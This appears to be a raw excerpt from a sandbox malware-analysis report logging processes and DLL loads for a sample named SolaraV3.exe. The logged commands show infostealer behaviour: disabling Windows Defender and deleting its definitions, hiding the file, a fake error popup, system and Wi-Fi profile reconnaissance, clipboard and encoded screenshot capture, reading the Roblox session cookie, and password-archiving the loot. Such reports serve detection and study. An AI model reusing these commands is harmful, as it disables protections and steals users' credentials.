Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('?????? ?????? ???? ????????. ?????? ??? ?????????? ????? ?????? ? ?????? ?????!', 0, 'Error!', 32+16);close()"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.cmdline"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESF203.tmp" "c:\Users\user\AppData\Local\Temp\se3yji4z\CSC9CC35FFA2F54059AD6E143F6E3C2E84.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe C:\Users\user~1\AppData\Local\Temp\_MEI28842\rar.exe a -r -hp"qwerty123" "C:\Users\user~1\AppData\Local\Temp\w0e8R.zip" *
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: python3.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: libffi-7.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: sqlite3.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: libcrypto-1_1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: libssl-1_1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: mmdevapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: ksuser.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: avrt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: audioses.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: midimap.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
